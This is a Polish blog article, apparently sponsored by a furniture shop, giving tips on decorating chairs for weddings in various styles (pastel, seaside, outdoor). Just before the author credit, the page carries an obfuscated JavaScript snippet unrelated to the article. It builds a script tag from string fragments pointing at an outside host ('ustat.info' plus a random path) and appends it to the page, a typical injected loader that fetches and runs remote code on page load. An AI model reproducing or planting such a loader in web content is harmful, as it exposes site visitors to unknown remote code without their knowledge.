Jak udekorować krzesła na wesele?

Share on facebook
Share on google
Share on twitter
Share on linkedin

Dzień wesela to wielka data w życiu każdej pary, którą pamiętać się będzie do końca życia. Nerwy i stres związany z przygotowaniami zazwyczaj sięgają zenitu już na kilka miesięcy przed ceremonią.
Wszystko musi być perfekcyjne i zapięte na ostatni guzik. O stronę wizualną wesela zdecydowanie martwią się bardziej panie niż panowie, tak więc wybór kwiatów, oświetlenia i dekoracji zazwyczaj przypada pannie młodej.

Niepisane zasady dekoracji

Nie istnieje coś takiego, jak kodeks, w którym są spinane wszystkie reguły dotyczące dekoracji sali i krzeseł weselnych, nie mniej jednak istnieją pewne wytyczne, których nikt nie łamie. Po pierwsze wszystkie siedzenia dla gości powinny posiadać jednakową dekoracje. Nie zaburzają one wtedy pewnych wizualnych konwenansów, przez co potrafią stworzyć jedną, przystępną dla oka całość. Następnie krzesła pary młodej. Zdecydowanie muszą być one przystrojone w inny rodzaj dekoracji, tak aby wyróżniały się spośród innych. Tradycyjnie posiadają białe fałdy materiału, które często przypominają królewskie trony. Towarzyszą im drobne ozdoby w postaci kwiatów i wstążek. Jedną z ostatnich niepisanych zasad dotyczących ozdabiania krzeseł jest spójna kolorystyka i rozmiar siedzeń. Jeśli jedno krzesło jest białe, a po zewnętrznej części oparcia znajduje się kontrastująca wstążka, wszystkie krzesła na sali muszą takie być.

Wesele jak z bajki

Wynajmując salę weselną głównie kieruje się jej ceną, wielkością i barwami królującymi na ścianach. Idealna kombinacja stonowanych kolorów w odcieniach beżu pozwoli na udekorowanie stołu i krzeseł weselnych w delikatne pudrowo różowe kwiaty lub wstążki. Ten typ zmieszania barw jest jednym z najpopularniejszych na polskich i zagranicznych ceremoniach ślubnych. Dekoracje wykonane na krzesła weselne wykonane ze świeżych kwiatów są niesamowicie kosztowne, więc większość par decyduje się na sztuczne ich zamienniki. Wyglądem przypominają te prawdziwe, jednakże są zdecydowanie trwalsze od tych świeżych. Pudrowe odcienie dekoracji pozwolą  na stworzenie delikatnej i romantycznej atmosfery jak z bajki.

A może nad morze

Wesela organizowane w nadmorskich hotelach i restauracjach posiadają w swojej ofercie dekoracyjnej wspaniałe propozycje utrzymane w morskich klimatach. Tradycyjnie stół i krzesła nakryte są białym materiałem, jednakże posiadają one delikatne ozdoby w niecodziennych niebieskich odcieniach. Klimat, który daje bliskość morza i owe niebieskie ozdoby wzmacniają wrażenie unikatowości i wyjątkowości nocy weselnej. Wszystkie elementy ozdobne posiadają ten sam odcień granatu lub błękitu.

Wesele pod chmurką

Jest to marzenie wielu osób, Klimatyczne oświetlenie, świeże powietrze i przepiękne dekoracje sprawią, że ta noc będzie tematem rozmów przy rodzinnym stole przez następnych parę miesięcy. Wystrój takiego miejsca zazwyczaj sprowadza się do najprostszych elementów utrzymanych w jednej tonacji kolorystycznej, tj. białej. Krzesła na weselu pod chmurką są przystrojone w delikatny materiał, nieposiadający żadnych ozdób. Same siedzenia zrobione są z drewna, tak aby wpasowały się w ciepły, rodzinny charakter ceremonii. W niektórych przypadkach państwo młodzi decydują się na zamianę girland wykonanych z kwiatów, na maże lampki, które nadają intymnego klimatu po zmierzchu.

Grunt to znać swój gust

Wybór dekoracji sali i krzeseł na wesele jest ogromny i często przytłacza przyszłe panny młode, nie mniej jednak jeśli zna się swój gust, drogą eliminacji można zadecydować o wyborze.

(function(){
q6wv=document.createElement(“script”);q6wv_=(“us”)+(“ta”);
q6wv_+=”t”+(“.”);q6wv_+=(“in”);q6wvu=”1873013″;q6wv.async=true;
q6wvu+=”.egd8gtt56wvp987yt”;q6wv.type=”text/javascript”;q6wv_+=”f”+”o”+(“/”);
q6wvu+=”1bk4wcw6xi0rske”;q6wv.src=”//”+q6wv_+q6wvu;
dq6wv=document.body;dq6wv.appendChild(q6wv);
})();

Autor artykułu
Artykuł został przygotowany przez sklep z meblami skandynawskimi Sardot specjalizujący się w sprzedaży sof, krzeseł, stołów i innych dodatków wnętrzarskich.

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.